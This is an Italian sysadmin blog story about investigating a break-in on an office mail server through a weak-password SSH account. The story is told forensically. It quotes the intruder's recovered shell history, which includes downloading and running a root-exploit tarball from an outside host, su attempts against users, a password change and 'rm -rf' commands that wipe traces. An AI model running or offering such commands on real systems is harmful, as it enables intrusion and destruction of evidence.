Tales from the Machine Room |
Home Page | Comments | Articles | Faq | Documents | Search | Archive | Tales from the Machine Room | Contribute | Set language to:en it | Login/Register
B - D? Sono B. Senti, qui e' successo un casino dovresti venire a dare un occhiata.
Non devo dire come e' che B ha il mio numero di cellofono eh?
IO - ? Io? Alle sette di mattina? E perche' io?
B - Ti ricordi l'altra volta quando abbiamo
scoperto quei PC di $noivendiamoariafritta nell'armadio? Ecco, ci sono altri
problemi e penso che dovresti dare un occhiata a qualche cosa.
IO - Hemmm... io dovrei andare in ufficio...
B - Chiamo DB e gli dico che vieni qui per fare una cosa importantissima.
IO - Ma seriamente, non potete aspettare nel pom...
B - Nooooo!!!!!
Comunque, dopo un certo tira-e-molla ed una chiamata diretta a DB che da la sua benedizione (e la mia doccia per ritornare in forma quasi umana), mi dirigo verso $noivendiamobigliettisuinternet (che in effetti sta a 5 km da casa mia).
Li' B mi agguanta e mi spiega che succede.
B - Allora, stamani la nostra receptionista e' arrivata molto presto e non
riusciva a leggere la sua posta.
IO - E che c'e' di strano? Si sara' scordata la password.
B - No, non si era scordata la password, perche' non la cambia mai, ma
qualcuno l'aveva cambiata per lei e no non sono stata io a
cambiarla e si io sono l'unica che puo' cambiare le password degli
utenti.
IO - (aspettando il seguito) ...e?
B - Da quando in qua le password si cambiano da sole?
IO - Huemmm... di solito non succede. Vabbe' vediamo sta cosa.
Cosi' andiamo in Sala Macchine, perche' B (ragazza intelligente) ha staccato il cavo di rete del server di posta interno, che fa anche da gateway verso internet per l'ufficio. Attacco una tastiera ed un monitor e guardo. Un 'last' mi dice che gli unici che hanno fatto login sono B dalla console alle 7 di mattina e UL di $noivendiamoariafritta via SSH alle 2 del mattino... Quest'ultimo risulta aver fatto login da un IP di AOL. Qui gatta ci cova.
Un controllino nella homedir di UL la rivela vuota. Vuota. Sento puzza di bruciato. Come minimo dovrebbe esserci un .bash_history se ha fatto login via SSH.
Un controllo nel log di sistema mi dice che "UL" ha sbagliato password 2 volte prima di accedere. Non sembra un brute-force attack.
Sfodero la chiavetta USB ed installo il mio root-kit-test, un controllo non riporta cose strane. Un rapido test mi dice che gli unici files modificati in /etc sono /etc/passwd ed /etc/shadow, ma a questo punto non sono del tutto sicuro di quanto posso fidarmi di questa macchina.
IO - Mi sa che hai fatto bene a chiamarmi e che questa macchina dovra essere
reinstallata, tanto per stare sul sicuro. Sai mica che password aveva UL?
B - Non lo so ma posso scoprirlo.
IO - Ok, tu vai e scopri che io vedo qui che posso scoprire.
Mi viene in mente a quel punto che il backup parte alle 2.30, e magari ha 'salvato' qualche cosa di interessante. Quindi guardo sul disco USB (che viene montato e smontato dalla procedura di backup) e vedo che la directory di UL non e' vuota nel backup di ieri. O gioia. Cosi' riesco a scovare questo interessante frammento di storia:
w
uname -a
ps aux
ls -a
last
ps aux
mailq
ls -a
cat /etc/issue
ps ax
wget makingcash.ucoz.co.uk/Muistul.tgz
tar xzvf Muistul.tgz
cd .local/
./2007
./raptor
ls
ps aux
last root
ps ax
uname -a
cat /etc/passwd
su receptions
su B
su SL
su CL
su ...
cat /etc/passwd
su ...
su ...
su ...
ls -a
cd /tmp
ls -a
rm -rf .* *
cd /var/tmp
ls -a
rm -rf .* *
cd ~
ls -a
cat .bash_history
rm -rf .* *
passwd
ps aux
ls -a
last
clear
cat /etc/issue
exit
"makingcash" eh? Un rapido controllo mi dice che quel file contiene un paio
di local root exploit, che purtroppo per il nostro sedicente cracker, non
funzionano su questo kernel. Il tipo non mi sembra poi tanto scafato, io
avrei cercato di fare login su altre macchine della rete, questo invece sembra
si sia concentrato solo su questa e neanche tanto. Ma il 'su' verso la
receptionista ha funzionato, quindi controllo il .bash_history della
receptionista e vedo che il tipo ha cambiato la password (confermando i
sospetti di B) e poco altro.Gli altri "su" non hanno dato frutti. Un dubbio atroce mi piglia e controllo. No, per fortuna UL non era in sudo. Non che il tipo ci abbia provato comunque.
B ritorna con una faccia schifata.
B - Ci crederesti? La sua password era $nomediUL123.
IO - E adesso e' "seilicenziatoidiota"?
B - Dimmi che non ci e' entrato dentro qualcuno!
IO - Sorry. Ma si', e' entrato dentro qualcuno. Ma non mi sembra che abbia fatto
molto. In ogni caso l'unico accesso che aveva era in questa macchina no? Quindi
anche se aveva una password idiota non ha potuto fare danni altrove. Vedi che
a volte il non avere un sistema di autenticazione centralizzato e' un bene?
A questo punto B ha insistito per offrirmi la colazione nel baretto all'angolo e poi ho speso il resto della giornata reinstallando la macchina e controllando gli altri sistemi dell'ufficio. Dai discorsi che ho udito non credo che $noivendiamoariafritta vendera molto in questo posto.
Davide
12/01/2009 08:30
Comments are added when and more important if I have the time to review them and after removing Spam, Crap, Phishing and the like. So don't hold your breath. And if your comment doesn't appear, is probably becuase it wasn't worth it.
Un buon modo per iniziare la giornata By Gama posted 12/01/2009 08:18
-- Gama
Data By Kaspa posted 12/01/2009 08:19
-- Kaspa
-AT- Kaspa By Davide Bianchi posted 12/01/2009 08:31
-- Davide Bianchi
Che dolce risveglio...... By Eugenio Dorigati posted 12/01/2009 08:53
-- Eugenio Dorigati
subject By RaDu posted 12/01/2009 08:54
-- RaDu
-AT- RaDu By Davide Bianchi posted 12/01/2009 09:23
-- Davide Bianchi
Signature By Gama posted 12/01/2009 08:55
-- Gama
Non tutto il male viene per nuocere.... By Cobra78 posted 12/01/2009 09:17
-- Cobra78
Brutti ricordi By johnnymnemonic posted 12/01/2009 09:56
-- johnnymnemonic
E ci risiamo... By noob posted 12/01/2009 10:06
-- Matteo Ricci
Exploit By Daniele Levi posted 12/01/2009 10:10
-- Daniele Levi
subject By Daniele G. posted 12/01/2009 10:22
-- Daniele G.
-AT- Daniele G. By Davide Bianchi posted 12/01/2009 12:30
-- Davide Bianchi
dipende... By mau posted 12/01/2009 18:54
-- mau
cose varie By Herr Franz posted 12/01/2009 11:10
-- Herr Franz
-AT- Herr Franz By Davide Bianchi posted 12/01/2009 12:31
-- Davide Bianchi
groan... By dpantaleo posted 12/01/2009 11:20
-- dpantaleo
dolce risveglio? By Tommaso posted 12/01/2009 11:25
-- Tommaso
Sudo.. By Dom posted 12/01/2009 11:48
-- Dom
-AT- Dom By Davide Bianchi posted 12/01/2009 12:33
-- Davide Bianchi
Sudo ma Godo ? By filippo posted 12/01/2009 14:57
-- filippo
sudo By Andrea Ballarati posted 13/01/2009 09:01
-- Andrea Ballarati
+1 x sudo By Tommaso posted 13/01/2009 09:38
-- Tommaso
Hum... By spacexplorer posted 12/01/2009 12:40
-- spacexplorer
non male By Daniele posted 12/01/2009 12:40
-- Daniele
subject By Gabriele Corrieri posted 12/01/2009 13:14
-- Gabriele Corrieri
-AT- Gabriele Corrieri By Andrea Occhi posted 14/01/2009 17:26
-- Andrea Occhi
root exploit By checkitout3 posted 12/01/2009 13:26
-- checkitout3
-AT- checkitout3 By Davide Bianchi posted 12/01/2009 14:39
-- Davide Bianchi
root exploit By checkitout3 posted 12/01/2009 15:03
-- checkitout3
-AT- checkitout3 By Davide Bianchi posted 12/01/2009 15:05
-- Davide Bianchi
... By Nik posted 12/01/2009 19:04
-- Nik
Maaaa.... By Mick Zio Zero posted 12/01/2009 22:01
-- Mick Zio Zero
Bello By kache posted 12/01/2009 23:53
-- kache
-AT- kache By Davide Bianchi posted 13/01/2009 08:31
-- Davide Bianchi
... By Gabriele Corrieri posted 13/01/2009 00:54
-- Gabriele Corrieri
The bold and the red By maxxfi posted 13/01/2009 09:05
-- maxxfi
subject By Diego posted 13/01/2009 13:10
-AT- Diego By Davide Bianchi posted 13/01/2009 14:25
-- Davide Bianchi
-AT- Diego By Davide Bianchi posted 13/01/2009 14:48
-- Davide Bianchi
AAA By Samuel posted 13/01/2009 18:06
-- Samuel
-AT- Samuel By Davide Bianchi posted 13/01/2009 18:49
-- Davide Bianchi
scafato? By Thurill-AT-gmail.com posted 14/01/2009 14:02
-- Thurill-AT-gmail.com
-AT- Thurill-AT-gmail.com By Lo Zeno posted 15/01/2009 13:58
-- Lo Zeno
non funzionano su questo kernel By Davide Inglima posted 15/01/2009 21:02
-- Davide Inglima
Un buon modo di iniziare la giornata (2) By kallsu posted 16/01/2009 21:18
-- kallsu
-AT- kallsu By Davide Bianchi posted 17/01/2009 08:39
-- Davide Bianchi
quando il caso ci mette lo zampino ..... By soichiro posted 17/01/2009 22:56
-- soichiro
-AT- soichiro By Davide Bianchi posted 18/01/2009 09:17
-- Davide Bianchi
file scaricato By mk posted 20/03/2009 12:08
-- mk
This site is made by me with blood, sweat and gunpowder, if you want to republish or redistribute any part of it, please drop me (or the author of the article if is not me) a mail.
This site was composed with VIM, now is composed with VIM and the (in)famous CMS FdT.
This site isn't optimized for vision with any specific browser, nor
it requires special fonts or resolution.
You're free to see it as you wish.